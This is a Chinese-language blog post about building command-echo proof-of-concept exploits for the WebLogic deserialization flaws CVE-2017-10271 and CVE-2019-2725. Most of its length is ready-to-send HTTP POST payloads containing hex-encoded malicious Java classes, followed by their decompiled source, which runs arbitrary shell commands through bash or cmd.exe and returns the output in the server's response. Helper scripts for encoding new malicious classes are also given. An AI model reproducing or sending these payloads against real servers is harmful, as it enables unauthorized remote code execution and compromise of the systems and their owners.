#再谈 CVE-2017-10271回显POC构造
之前写过反序列化报错回显。
1、远程server放恶意jar包,服务器去远程server来请求恶意jar包
2、利用defineClass加载byte[]返回Class对象
从这里找到回显的poc,这个poc用的就是方法2.
详细POC如下:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 5126
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="weblogic.utils.Hex" method="fromHexString" id="cls">
<string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string>
</void>
<void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass">
<string>com.supeream.exploits.XmlExp</string>
<object idref="cls"></object>
<void method="newInstance">
<void method="say" id="proc">
<string>dir</string>
</void>
</void>
</void>
</void>
<void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork">
<void method="getResponse">
<void method="getServletOutputStream">
<void method="writeStream">
<object idref="proc"></object>
</void>
<void method="flush"/>
</void>
<void method="getWriter"><void method="write"><string></string></void></void>
</void>
</void>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
defineClass去加载com.supeream.exploits.XmlExp恶意类,恶意类代码已经Hex编码了。还原一下XmlExp代码,先对恶意类代码解码->bytes[]->写入1.class.再用idea/jd-gui反编译。
package weblogic;
import org.mozilla.classfile.DefiningClassLoader;
import weblogic.jdbc.wrapper.Array;
import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.Arrays;
import static weblogic.utils.Hex.hexValueOf;
public class hh {
public static void main(String[] args) throws NoSuchMethodException, IllegalAccessException, InstantiationException, InvocationTargetException, IOException {
System.out.println("hahah");
byte[] bt = fromHexString2("0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034");
File file = new File("1.class");
FileOutputStream fos = new FileOutputStream(file);
fos.write(bt);
fos.close();
// System.out.println(Arrays.toString(bt)); byte
// DefiningClassLoader cls = new DefiningClassLoader();
// Class cl =cls.defineClass("com.supeream.exploits.XmlExp",bt);
// System.out.println(cl);
// System.out.println(cl.getMethods());//
// Method m = cl.getMethod("say",String.class);
// Object dir = m.invoke(cl.newInstance(), "calc");
}
public static byte[] fromHexString1(byte[] barray, int len) {
int i = 0;
if (barray[0] == 48 && (barray[1] == 120 || barray[1] == 88)) {
i += 2;
len -= 2;
}
int outlen = len / 2;
byte[] out = new byte[outlen];
for(int j = 0; j < outlen; ++j) {
out[j] = (byte)(hexValueOf(barray[i++]) << 4 | hexValueOf(barray[i++]));
}
return out;
}
public static byte[] fromHexString2(String hexString) {
byte[] bytes;
try {
bytes = hexString.getBytes("US-ASCII");
} catch (UnsupportedEncodingException var4) {
bytes = new byte[hexString.length()];
for(int i = 0; i < bytes.length; ++i) {
bytes[i] = (byte)hexString.charAt(i);
}
}
System.out.println(bytes);
return fromHexString1(bytes, bytes.length);
}
}
拿到XmlExp类代码如下:
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package com.supeream.exploits;
import java.io.InputStream;
import java.util.ArrayList;
import java.util.List;
public class XmlExp {
public XmlExp() {
}
public InputStream say(String cmd) throws Exception {
boolean isLinux = true;
String osTyp = System.getProperty("os.name");
if (osTyp != null && osTyp.toLowerCase().contains("win")) {
isLinux = false;
}
List<String> cmds = new ArrayList();
if (cmd.startsWith("$NO$")) {
cmds.add(cmd.substring(4));
} else if (isLinux) {
cmds.add("/bin/bash");
cmds.add("-c");
cmds.add(cmd);
} else {
cmds.add("cmd.exe");
cmds.add("/c");
cmds.add(cmd);
}
ProcessBuilder processBuilder = new ProcessBuilder(cmds);
processBuilder.redirectErrorStream(true);
Process proc = processBuilder.start();
return proc.getInputStream();
}
}
开始以为回显的原因是报错回显的,实际上不是,而是用到weblogic内部回显类进行回显,这也算是个骚思路了,这点是get到了。
分析下POC构造过程:
传入恶意类hex编码id设置为cls交给weblogic.utils.Hex.fromHexString类转换为byte[]----->org.mozilla.classfile.DefiningClassLoader类的defineClass方法传入com.supeream.exploits.XmlExp恶意类,通过newInstance方法实例化恶意类并调用say方法,传入dir命令id设置为proc交给weblogic内部回显类回显。实际对应代码如下操作。
DefiningClassLoader cls = new DefiningClassLoader();
Class cl =cls.defineClass("com.supeream.exploits.XmlExp",bt);
Method m = cl.getMethod("say",String.class);
Object dir = m.invoke(cl.newInstance(), "calc");
最后将回显结果交给weblogic回显处理得到回显结果,这块poc构造可以跟踪下正常处理回显是什么样的来构造。
在com.sun.beans.ObjectHandler下断,idref这里跟进lookup
idref对应id是proc
加载恶意方法的地方,剩下就是拼接返回包,这里就不跟了
最后实现效果如下:
有人请教怎么重新恶意类,恶意类 1.java编译成1.class,读取1.class到InputStream 在转换成byte[]就ok了,对应如下小脚本。
package weblogic;
import java.io.*;
public class exp {
public static void main(String[] args) throws IOException {
InputStream in = new FileInputStream("F:\\IDEA-project\\weblogic\\1.class");
byte[] data = toByteArray(in);
in.close();
System.out.println(bytesToHexString(data,1712));
}
public static byte[] toByteArray(InputStream in) throws IOException {
ByteArrayOutputStream out = new ByteArrayOutputStream();
byte[] buffer = new byte[1024 * 4];
int n = 0;
while ((n = in.read(buffer)) != -1) {
out.write(buffer, 0, n);
}
return out.toByteArray();
}
public static String bytesToHexString(byte[] bArray, int length)
{
StringBuffer sb = new StringBuffer(length);
String sTemp;
for (int i = 0; i < length; i++)
{
sTemp = Integer.toHexString(0xFF & bArray[i]);
if (sTemp.length() < 2)
sb.append(0);
sb.append(sTemp.toUpperCase());
}
return sb.toString();
}
}
weblogic 2725 12版本的回显就跟上面的利用一样。
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.50.129:7001
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
Content-Length: 9750
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><class><string>org.slf4j.ext.EventData</string><void>
<string><![CDATA[<java><void class="weblogic.utils.Hex" method="fromHexString" id="cls">
<string>0xcafebabe0000003300fd0a003d00700a007100720700730a000300740a003d00750a007600770800780a0079007a08007b0a0076007c0a007d007e0a007d007f0700800a000d00810a001100820a000d00830700840a001100850a007900860a007900870800880700890a001600700a008a008b0a008c008d0a0016008e08008f0a001600900800910a007900920a009300940a002700950800960a009700980a0079009908009a07009b0a0025007007009c08009d0a0027009e0a0027009f0a002700a00800a10a007900a20a007900a30b00a400a50800a60800a70800a80800a90700aa0a003400ab0a003400ac0a003400ad0a009300ae0a00af00b00a00b100b20800b30700b40700b50100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010015284c6a6176612f6c616e672f537472696e673b29560100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01001568747470436f6e6e656374696f6e48616e646c65720100314c7765626c6f6769632f736572766c65742f696e7465726e616c2f48747470436f6e6e656374696f6e48616e646c65723b01000e736572766c65745265717565737401002e4c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c657452657175657374496d706c3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000d6578656375746554687265616401001d4c7765626c6f6769632f776f726b2f457865637574655468726561643b01000f736572766c6574526573706f6e736501002f4c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c6574526573706f6e7365496d706c3b01000b776f726b4164617074657201001b4c7765626c6f6769632f776f726b2f576f726b416461707465723b010014776562417070536572766c6574436f6e746578740100304c7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e746578743b0100047061746801000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000b7072696e745772697465720100154c6a6176612f696f2f5072696e745772697465723b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b01000d537461636b4d61705461626c650700b40700b60700730700b70700b80700b90700ba07009c01000a457863657074696f6e730700bb01000a536f7572636546696c6501000b586d6c4578702e6a6176610c003e003f0700bc0c00bd00be01001b7765626c6f6769632f776f726b2f457865637574655468726561640c00bf00c00c00c100c20700c30c00c400c501001c436f6e7461696e6572537570706f727450726f7669646572496d706c0700b60c00c600c7010011636f6e6e656374696f6e48616e646c65720c00c800c90700ca0c00cb00cc0c00cd00ce01002f7765626c6f6769632f736572766c65742f696e7465726e616c2f48747470436f6e6e656374696f6e48616e646c65720c00cf00d00c00d100d20c00d300d401002c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c657452657175657374496d706c0c00d500d40c00d600c50c00d700d801000677686f616d690100176a6176612f6c616e672f537472696e674275696c6465720700b90c00d900da0700db0c00dc00c50c00dd00de01000b2f7761722f61612e7478740c00df00c5010010676976656d65776c73776172706174680c00e000e10700b70c00e200e30c00e400460100076f732e6e616d650700e50c00e600e70c00e800c501000377696e0100136a6176612f7574696c2f41727261794c6973740100136a6176612f696f2f5072696e74577269746572010001780c003e00460c00e900460c00ea003f010004244e4f240c00eb00e10c00ec00ed0700ba0c00ee00ef0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c003e00f00c00f100f20c00f300f40c00f500f60700f70c00f800f90700fa0c00fb00fc01000001001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701002d7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c6574526573706f6e7365496d706c0100197765626c6f6769632f776f726b2f576f726b4164617074657201002e7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e7465787401000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b01000e67657443757272656e74576f726b01001d28294c7765626c6f6769632f776f726b2f576f726b416461707465723b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b01000f6a6176612f6c616e672f436c6173730100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b010011676574536572766c65745265717565737401003028294c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c657452657175657374496d706c3b01000a676574436f6e7465787401003228294c7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e746578743b010012676574536572766c6574526573706f6e736501003128294c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c6574526573706f6e7365496d706c3b01000b676574526573706f6e73650100047472696d0100066c656e67746801000328294901000e676574526f6f7454656d7044697201001028294c6a6176612f696f2f46696c653b01000c6a6176612f696f2f46696c6501000f6765744162736f6c75746550617468010006617070656e6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e674275696c6465723b010008746f537472696e67010010657175616c7349676e6f726543617365010015284c6a6176612f6c616e672f537472696e673b295a01000967657457726974657201001728294c6a6176612f696f2f5072696e745772697465723b01000577726974650100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f776572436173650100077072696e746c6e010005636c6f736501000a73746172747357697468010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b010016676574536572766c65744f757470757453747265616d01003528294c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c65744f757470757453747265616d496d706c3b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100317765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c65744f757470757453747265616d496d706c01000b777269746553747265616d010018284c6a6176612f696f2f496e70757453747265616d3b29560021003c003d0000000000020001003e003f000100400000002f00010001000000052ab70001b10000000200410000000600010000000600420000000c000100000005004300440000000100450046000200400000032e0004000d0000018ab80002c000034d014e2cb600043a04013a051904b60005b600061207b600089900341904b600051209b6000a3a06190604b6000b19061904b6000cc0000d3a071907b6000eb6000f3a051907b600104ea7001f1904c100119900171904c000113a061906b600124e1906b6000f3a052bc6000d2bb60013b600149a000612154cbb001659b700171905b60018b60019b6001a121bb6001ab6001c3a062b121db6001e99000d2db6001f1906b60020b10436071221b800223a081908c600131908b600231224b60008990006033607bb002559b700263a09bb002759bb001659b700171906b6001a1228b6001ab6001cb700293a0a190a1906b6002a190ab6002b2b122cb6002d99001319092b07b6002eb9002f020057a70045150799002319091230b9002f02005719091231b9002f02005719092bb9002f020057a7002019091232b9002f02005719091233b9002f02005719092bb9002f020057bb0034591909b700353a0b190b04b6003657190bb600373a0c2db60038190cb60039b6003a2db6001f123bb60020b1000000030041000000ae002b0000000b0007000c0009000d000f000e0012000f00220010002e00110034001200400013004a001400500015005b00160062001700680018006f001c007d001d00800020009c002200a5002300ae002400af002800b2002900b9002a00cb002b00ce002e00d7003000f4003100fb0032010000330109003401190035011e00360128003701320038013e003a0148003b0152003c015b004001660041016d00420174004401800045018900470042000000a20010002e0022004700480006004000100049004a00070062000d004b004c00060000018a0043004400000000018a004d004e000100070183004f0050000200090181005100520003000f017b00530054000400120178005500560005009c00ee0057004e000600b200d800580059000700b900d1005a004e000800d700b3005b005c000900f40096005d005e000a01660024005f0060000b0174001600610062000c0063000000360009ff0053000607006407006507006607006707006807006900001b0d02fc002e070065fd001e01070065fd004a07006a07006b241c006c000000040001006d0001006e00000002006f</string></void><void class="org.mozilla.classfile.DefiningClassLoader"><void method="defineClass"><string>com.supeream.exploits.XmlExp</string><object idref="cls"></object><void method="newInstance"><void method="say" id="proc"><string>whoami</string></void></void></void></void><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork"><void method="getResponse"><void method="getServletOutputStream"><void method="writeStream"><object idref="proc"></object></void><void method="flush"/></void><void method="getWriter"><void method="write"><string></string></void></void></void></void></void></java>]]></string>
</void>
</class>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body>
</soapenv:Envelope>
恶意类:
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package com.supeream.exploits;
import java.io.PrintWriter;
import java.lang.reflect.Field;
import java.util.ArrayList;
import java.util.List;
import weblogic.servlet.internal.HttpConnectionHandler;
import weblogic.servlet.internal.ServletRequestImpl;
import weblogic.servlet.internal.ServletResponseImpl;
import weblogic.servlet.internal.WebAppServletContext;
import weblogic.work.ExecuteThread;
import weblogic.work.WorkAdapter;
public class XmlExp {
public XmlExp() {
}
public void say(String cmd) throws Exception {
ExecuteThread executeThread = (ExecuteThread)Thread.currentThread();
ServletResponseImpl servletResponse = null;
WorkAdapter workAdapter = executeThread.getCurrentWork();
WebAppServletContext webAppServletContext = null;
if (workAdapter.getClass().getName().contains("ContainerSupportProviderImpl")) {
Field field = workAdapter.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
HttpConnectionHandler httpConnectionHandler = (HttpConnectionHandler)field.get(workAdapter);
webAppServletContext = httpConnectionHandler.getServletRequest().getContext();
servletResponse = httpConnectionHandler.getServletResponse();
} else if (workAdapter instanceof ServletRequestImpl) {
ServletRequestImpl servletRequest = (ServletRequestImpl)workAdapter;
servletResponse = servletRequest.getResponse();
webAppServletContext = servletRequest.getContext();
}
if (cmd == null || cmd.trim().length() == 0) {
cmd = "whoami";
}
String path = webAppServletContext.getRootTempDir().getAbsolutePath() + "/war/aa.txt";
if (cmd.equalsIgnoreCase("givemewlswarpath")) {
servletResponse.getWriter().write(path);
} else {
boolean isLinux = true;
String osTyp = System.getProperty("os.name");
if (osTyp != null && osTyp.toLowerCase().contains("win")) {
isLinux = false;
}
List cmds = new ArrayList();
PrintWriter printWriter = new PrintWriter(path + "x");
printWriter.println(path);
printWriter.close();
if (cmd.startsWith("$NO$")) {
cmds.add(cmd.substring(4));
} else if (isLinux) {
cmds.add("/bin/bash");
cmds.add("-c");
cmds.add(cmd);
} else {
cmds.add("cmd.exe");
cmds.add("/c");
cmds.add(cmd);
}
ProcessBuilder processBuilder = new ProcessBuilder(cmds);
processBuilder.redirectErrorStream(true);
Process proc = processBuilder.start();
servletResponse.getServletOutputStream().writeStream(proc.getInputStream());
servletResponse.getWriter().write("");
}
}
}
